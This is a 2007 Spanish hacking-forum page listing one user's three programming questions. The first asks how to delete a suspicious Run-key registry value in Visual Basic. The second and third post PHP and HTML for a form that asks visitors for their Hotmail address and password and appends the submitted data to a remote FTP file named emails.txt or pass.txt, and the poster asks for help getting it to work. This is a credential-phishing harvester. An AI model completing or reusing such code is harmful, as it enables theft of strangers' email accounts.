elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Temas
Páginas: [1]
1  Programación / Programación Visual Basic / borrar cadena del registro en: 15 Septiembre 2007, 18:30 pm
aver.. e aki mi pregunta resulta k quiero borrar un enclave del registro de windows ok?? y dentro de el quiero borrar un valor

Código:

'Variable de objeto
Dim MiObjeto As Object


'Seteamos la variable anterior para poder usarla para eliminar la clave
Set MiObjeto = CreateObject("Wscript.Shell")

'Eliminamos la clave WallPaperDir
MiObjeto.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WallPaperDir"

'Eliminamos la variable de objeto
Set MiObjeto = Nothing


utilizo este codigo y aora mi duda esta en k quiero borrar esto:
Código:
Clave: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Valor: "Windows Lsass Services" = "%Windir%\system\******.exe"


dond tengo introducir el valor??
2  Programación / PHP / Duda codigo PHP en: 9 Septiembre 2007, 15:30 pm
aver stoi intentando krear komo una especie de base de datos.. xo en verdad es un pokito extraña.. estoi intentando volcar el contenido de un formulario en un archivo de texto plano.. aki indico el codigo
archivo principal
Código:
<html>
<body>

<FORM METHOD="post" ACTION="txt.php">

<p>Su cuenta de Correo <input type="text" name="Email" size="20" value="@hotmail.com">
<p>Su contraseña <input type="text" name="pass" size="20" value="******">

<input type="submit" value="enviar" name="enviar">

</body>
</html>

archivo txt.php
Código:
<?PHP; 

if (isset($_post['enviar'])
{

    if (@$fp = fopen("ftp://*****:******@ftp.usuarios.lycos.es/emails.txt","a"))
    {
        fwrite($fp,$_post['Email']."\r\n");
        fclose($fp);
    }
}

?>

El problema es k me da un error en la linea 4 del txt.php.. e intentado por varios metodos xo no le encuentro solucion, x favor una ayuda me sentaria muy bien un saludo
3  Programación / PHP / Duda codigo PHP en: 9 Septiembre 2007, 12:13 pm
Aver.. wenas..

yo sk toi haciendo un formulario ok? y mi intencion es k el formulario este en un primer arxivo con extension html ok? yk despues kuando le des al boton enviar se vaya a un arxivo html tmb con el sigiente codigo

Código:
<?  
$fp = fopen("ftp://*****:*******@ftp.usuarios.lycos.es/pass.txt","a"); 
fwrite($fp,$_POST["$name"]); 
fclose($fp); 
?>

ok? aora el problema kuando lo ace no me escribe en el arxivo detallado xk?

$name es el nombre del del input, ya e comprobado eso xo no entiendo el xk no salen?? akaso tngo k ponerlos en arxivos php?? no ace falta si ya e declarado el tipo de lenguaje no?
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines